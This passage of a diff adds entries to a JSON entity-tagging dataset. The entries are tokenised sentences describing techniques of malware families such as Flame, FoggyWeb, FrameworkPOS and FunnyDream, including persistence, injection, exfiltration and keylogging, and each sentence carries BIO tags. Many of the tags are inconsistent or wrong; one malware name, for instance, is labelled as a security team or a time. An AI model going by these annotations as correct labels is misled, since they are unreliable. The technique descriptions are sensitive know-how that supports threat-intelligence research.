+ "system", + "over", + "the", + "Bluetooth", + "protocol,", + "acting", + "as", + "a", + "Bluetooth", + "beacon,", + "and", + "identifying", + "other", + "Bluetooth", + "devices", + "in", + "the", + "vicinity." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Flame", + "can", + "use", + "MS10-061", + "to", + "exploit", + "a", + "print", + "spooler", + "vulnerability", + "in", + "a", + "remote", + "system", + "with", + "a", + "shared", + "printer", + "in", + "order", + "to", + "move", + "laterally." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "I-Exp", + "O", + "B-Exp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Flame", + "can", + "create", + "backdoor", + "accounts", + "with", + "login", + "“HelpAssistant”", + "on", + "domain", + "connected", + "systems", + "if", + "appropriate", + "rights", + "are", + "available." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Purp", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Flame", + "contains", + "modules", + "to", + "infect", + "USB", + "sticks", + "and", + "spread", + "laterally", + "to", + "other", + "Windows", + "systems", + "the", + "stick", + "is", + "plugged", + "into", + "using", + "Autorun", + "functionality." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rundll32.exe", + "is", + "used", + "as", + "a", + "way", + "of", + "executing", + "Flame", + "at", + "the", + "command-line." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Flame", + "can", + "take", + "regular", + "screenshots", + "when", + "certain", + "applications", + "are", + "open", + "that", + "are", + "sent", + "to", + "the", + "command", + "and", + "control", + "server." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Flame", + "identifies", + "security", + "software", + "such", + "as", + "antivirus", + "through", + "the", + "Security", + "module." + ], + "ner_tags": [ + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FlawedAmmyy", + "can", + "collect", + "clipboard", + "data." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "FlawedAmmyy", + "may", + "obfuscate", + "portions", + "of", + "the", + "initial", + "C2", + "handshake." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FlawedAmmyy", + "has", + "collected", + "information", + "and", + "files", + "from", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FlawedAmmyy", + "has", + "sent", + "data", + "collected", + "from", + "a", + "compromised", + "host", + "to", + "its", + "C2", + "servers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FlawedAmmyy", + "can", + "execute", + "batch", + "scripts", + "to", + "delete", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FlawedAmmyy", + "can", + "transfer", + "files", + "from", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "FlawedAmmyy", + "can", + "collect", + "mouse", + "events." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "FlawedAmmyy", + "can", + "collect", + "keyboard", + "events." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "FlawedAmmyy", + "enumerates", + "the", + "privilege", + "level", + "of", + "the", + "victim", + "during", + "the", + "initial", + "infection." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FlawedAmmyy", + "has", + "been", + "installed", + "via", + "`msiexec.exe`." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "FlawedAmmyy", + "will", + "attempt", + "to", + "detect", + "if", + "a", + "usable", + "smart", + "card", + "is", + "current", + "inserted", + "into", + "a", + "card", + "reader." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FlawedAmmyy", + "has", + "used", + "PowerShell", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FlawedAmmyy", + "has", + "established", + "persistence", + "via", + "the", + "`HKCU\\SOFTWARE\\microsoft\\windows\\currentversion\\run`", + "registry", + "key." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "FlawedAmmyy", + "has", + "used", + "`rundll32`", + "for", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FlawedAmmyy", + "can", + "capture", + "screenshots." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "FlawedAmmyy", + "will", + "attempt", + "to", + "detect", + "anti-virus", + "products", + "during", + "the", + "initial", + "infection." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FlawedAmmyy", + "has", + "used", + "SEAL", + "encryption", + "during", + "the", + "initial", + "C2", + "handshake." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FlawedAmmyy", + "can", + "collect", + "the", + "victim's", + "operating", + "system", + "and", + "computer", + "name", + "during", + "the", + "initial", + "infection." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FlawedAmmyy", + "enumerates", + "the", + "current", + "user", + "during", + "the", + "initial", + "infection." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FlawedAmmyy", + "has", + "used", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "FlawedAmmyy", + "has", + "used", + "`cmd`", + "to", + "execute", + "commands", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FlawedAmmyy", + "leverages", + "WMI", + "to", + "enumerate", + "anti-virus", + "on", + "the", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FlawedGrace", + "encrypts", + "its", + "C2", + "configuration", + "files", + "with", + "AES", + "in", + "CBC", + "mode." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FoggyWeb", + "can", + "use", + "a", + "dynamic", + "XOR", + "key", + "and", + "a", + "custom", + "XOR", + "methodology", + "to", + "encode", + "data", + "before", + "exfiltration.", + "Also,", + "FoggyWeb", + "can", + "encode", + "C2", + "command", + "output", + "within", + "a", + "legitimate", + "WebP", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FoggyWeb", + "can", + "invoke", + "the", + "`Common.Compress`", + "method", + "to", + "compress", + "data", + "with", + "the", + "C#", + "GZipStream", + "compression", + "class." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FoggyWeb", + "can", + "compile", + "and", + "execute", + "source", + "code", + "sent", + "to", + "the", + "compromised", + "AD", + "FS", + "server", + "via", + "a", + "specific", + "HTTP", + "POST." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "FoggyWeb's", + "loader", + "has", + "used", + "DLL", + "Search", + "Order", + "Hijacking", + "to", + "load", + "malicious", + "code", + "instead", + "of", + "the", + "legitimate", + "`version.dll`", + "during", + "the", + "`Microsoft.IdentityServer.ServiceHost.exe`", + "execution", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "FoggyWeb", + "can", + "retrieve", + "configuration", + "data", + "from", + "a", + "compromised", + "AD", + "FS", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FoggyWeb", + "can", + "be", + "decrypted", + "in", + "memory", + "using", + "a", + "Lightweight", + "Encryption", + "Algorithm", + "(LEA)-128", + "key", + "and", + "decoded", + "using", + "a", + "XOR", + "key." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FoggyWeb", + "has", + "been", + "XOR-encoded." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FoggyWeb", + "can", + "remotely", + "exfiltrate", + "sensitive", + "information", + "from", + "a", + "compromised", + "AD", + "FS", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Features", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FoggyWeb's", + "loader", + "can", + "check", + "for", + "the", + "FoggyWeb", + "backdoor", + ".pri", + "file", + "on", + "a", + "compromised", + "AD", + "FS", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FoggyWeb", + "can", + "receive", + "additional", + "malicious", + "components", + "from", + "an", + "actor", + "controlled", + "C2", + "server", + "and", + "execute", + "them", + "on", + "a", + "compromised", + "AD", + "FS", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FoggyWeb", + "can", + "masquerade", + "the", + "output", + "of", + "C2", + "commands", + "as", + "a", + "fake,", + "but", + "legitimately", + "formatted", + "WebP", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FoggyWeb", + "can", + "be", + "disguised", + "as", + "a", + "Visual", + "Studio", + "file", + "such", + "as", + "`Windows.Data.TimeZones.zh-PH.pri`", + "to", + "evade", + "detection.", + "Also,", + "FoggyWeb's", + "loader", + "can", + "mimic", + "a", + "genuine", + "`dll`", + "file", + "that", + "carries", + "out", + "the", + "same", + "import", + "functions", + "as", + "the", + "legitimate", + "Windows", + "`version.dll`", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "B-Features", + "B-Way", + "B-Features", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "FoggyWeb's", + "loader", + "can", + "use", + "API", + "functions", + "to", + "load", + "the", + "FoggyWeb", + "backdoor", + "into", + "the", + "same", + "Application", + "Domain", + "within", + "which", + "the", + "legitimate", + "AD", + "FS", + "managed", + "code", + "is", + "executed." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FoggyWeb", + "can", + "configure", + "custom", + "listeners", + "to", + "passively", + "monitor", + "all", + "incoming", + "HTTP", + "GET", + "and", + "POST", + "requests", + "sent", + "to", + "the", + "AD", + "FS", + "server", + "from", + "the", + "intranet/internet", + "and", + "intercept", + "HTTP", + "requests", + "that", + "match", + "the", + "custom", + "URI", + "patterns", + "defined", + "by", + "the", + "actor." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FoggyWeb", + "can", + "retrieve", + "token", + "signing", + "certificates", + "and", + "token", + "decryption", + "certificates", + "from", + "a", + "compromised", + "AD", + "FS", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Purp", + "I-Purp", + "B-Features", + "B-Purp", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FoggyWeb's", + "loader", + "can", + "enumerate", + "all", + "Common", + "Language", + "Runtimes", + "(CLRs)", + "and", + "running", + "Application", + "Domains", + "in", + "the", + "compromised", + "AD", + "FS", + "server's", + "<code>Microsoft.IdentityServer.ServiceHost.exe</code>", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "FoggyWeb's", + "loader", + "has", + "reflectively", + "loaded", + ".NET-based", + "assembly/payloads", + "into", + "memory." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FoggyWeb's", + "loader", + "can", + "call", + "the", + "<code>load()</code>", + "function", + "to", + "load", + "the", + "FoggyWeb", + "dll", + "into", + "an", + "Application", + "Domain", + "on", + "a", + "compromised", + "AD", + "FS", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FoggyWeb", + "has", + "used", + "a", + "dynamic", + "XOR", + "key", + "and", + "custom", + "XOR", + "methodology", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FoggyWeb", + "can", + "allow", + "abuse", + "of", + "a", + "compromised", + "AD", + "FS", + "server's", + "SAML", + "token." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FoggyWeb", + "has", + "the", + "ability", + "to", + "communicate", + "with", + "C2", + "servers", + "over", + "HTTP", + "GET/POST", + "requests." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Forfiles", + "can", + "be", + "used", + "to", + "act", + "on", + "(ex:", + "copy,", + "move,", + "etc.)", + "files/directories", + "in", + "a", + "system", + "during", + "(ex:", + "copy", + "files", + "into", + "a", + "staging", + "area", + "before)." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "B-Features", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Forfiles", + "can", + "be", + "used", + "to", + "locate", + "certain", + "types", + "of", + "files/directories", + "in", + "a", + "system.(ex:", + "locate", + "all", + "files", + "with", + "a", + "specific", + "extension,", + "name,", + "and/or", + "age)" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Forfiles", + "can", + "be", + "used", + "to", + "subvert", + "controls", + "and", + "possibly", + "conceal", + "command", + "execution", + "by", + "not", + "directly", + "invoking", + "cmd." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "FrameworkPOS", + "can", + "XOR", + "credit", + "card", + "information", + "before", + "exfiltration." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FrameworkPOS", + "can", + "collect", + "elements", + "related", + "to", + "credit", + "card", + "data", + "from", + "process", + "memory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FrameworkPOS", + "can", + "use", + "DNS", + "tunneling", + "for", + "exfiltration", + "of", + "credit", + "card", + "data." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FrameworkPOS", + "can", + "identifiy", + "payment", + "card", + "track", + "data", + "on", + "the", + "victim", + "and", + "copy", + "it", + "to", + "a", + "local", + "file", + "in", + "a", + "subdirectory", + "of", + "C:\\Windows\\." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FrameworkPOS", + "can", + "enumerate", + "and", + "exclude", + "selected", + "processes", + "on", + "a", + "compromised", + "host", + "to", + "speed", + "execution", + "of", + "memory", + "scraping." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FruitFly", + "executes", + "and", + "stores", + "obfuscated", + "Perl", + "scripts." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "FruitFly", + "will", + "delete", + "files", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FruitFly", + "looks", + "for", + "specific", + "files", + "and", + "file", + "types." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FruitFly", + "saves", + "itself", + "with", + "a", + "leading", + "\".\"", + "to", + "make", + "it", + "a", + "hidden", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FruitFly", + "persists", + "via", + "a", + "Launch", + "Agent." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "FruitFly", + "has", + "the", + "ability", + "to", + "list", + "processes", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FruitFly", + "takes", + "screenshots", + "of", + "the", + "user's", + "desktop." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FunnyDream", + "has", + "the", + "ability", + "to", + "discover", + "application", + "windows", + "via", + "execution", + "of", + "`EnumWindows`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FunnyDream", + "has", + "compressed", + "collected", + "files", + "with", + "zLib", + "and", + "encrypted", + "them", + "using", + "an", + "XOR", + "operation", + "with", + "the", + "string", + "key", + "from", + "the", + "command", + "line", + "or", + "`qwerasdf`", + "if", + "the", + "command", + "line", + "argument", + "doesn’t", + "contain", + "the", + "key.", + "File", + "names", + "are", + "obfuscated", + "using", + "XOR", + "with", + "the", + "same", + "key", + "as", + "the", + "compressed", + "file", + "content." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FunnyDream", + "has", + "compressed", + "collected", + "files", + "with", + "zLib." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "FunnyDream", + "can", + "monitor", + "files", + "for", + "changes", + "and", + "automatically", + "collect", + "them." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "FunnyDream", + "can", + "use", + "com", + "objects", + "identified", + "with", + "`CLSID_ShellLink`(`IShellLink`", + "and", + "`IPersistFile`)", + "and", + "`WScript.Shell`(`RegWrite`", + "method)", + "to", + "enable", + "persistence", + "mechanisms." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FunnyDream", + "can", + "send", + "compressed", + "and", + "obfuscated", + "packets", + "to", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FunnyDream", + "can", + "upload", + "files", + "from", + "victims'", + "machines." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "FunnyDream", + "FilePakMonitor", + "component", + "has", + "the", + "ability", + "to", + "collect", + "files", + "from", + "removable", + "devices." + ], + "ner_tags": [ + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "FunnyDream", + "FilepakMonitor", + "component", + "can", + "inject", + "into", + "the", + "Bka.exe", + "process", + "using", + "the", + "`VirtualAllocEx`,", + "`WriteProcessMemory`", + "and", + "`CreateRemoteThread`", + "APIs", + "to", + "load", + "the", + "DLL", + "component." + ], + "ner_tags": [ + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FunnyDream", + "can", + "Base64", + "encode", + "its", + "C2", + "address", + "stored", + "in", + "a", + "template", + "binary", + "with", + "the", + "`xyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw_-`", + "or", + "`xyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw_=`", + "character", + "sets." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FunnyDream", + "can", + "execute", + "commands,", + "including", + "gathering", + "user", + "information,", + "and", + "send", + "the", + "results", + "to", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FunnyDream", + "can", + "delete", + "files", + "including", + "its", + "dropper", + "component." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "FunnyDream", + "can", + "identify", + "files", + "with", + ".doc,", + ".docx,", + ".ppt,", + ".pptx,", + ".xls,", + ".xlsx,", + "and", + ".pdf", + "extensions", + "and", + "specific", + "timestamps", + "for", + "collection." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FunnyDream", + "has", + "the", + "ability", + "to", + "clean", + "traces", + "of", + "malware", + "deployment." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FunnyDream", + "can", + "download", + "additional", + "files", + "onto", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "FunnyDream", + "Keyrecord", + "component", + "can", + "capture", + "keystrokes." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "FunnyDream", + "can", + "stage", + "collected", + "information", + "including", + "screen", + "captures", + "and", + "logged", + "keystrokes", + "locally." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FunnyDream", + "has", + "used", + "a", + "service", + "named", + "`WSearch`", + "for", + "execution." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "FunnyDream", + "can", + "use", + "Native", + "API", + "for", + "defense", + "evasion,", + "discovery,", + "and", + "collection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "I-Purp", + "O", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "FunnyDream", + "can", + "communicate", + "with", + "C2", + "over", + "TCP", + "and", + "UDP." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "The", + "FunnyDream", + "FilepakMonitor", + "component", + "can", + "detect", + "removable", + "drive", + "insertion." + ], + "ner_tags": [ + "O", + "B-Way", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "FunnyDream", + "has", + "the", + "ability", + "to", + "discover", + "processes,", + "including", + "`Bka.exe`", + "and", + "`BkavUtil.exe`." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + 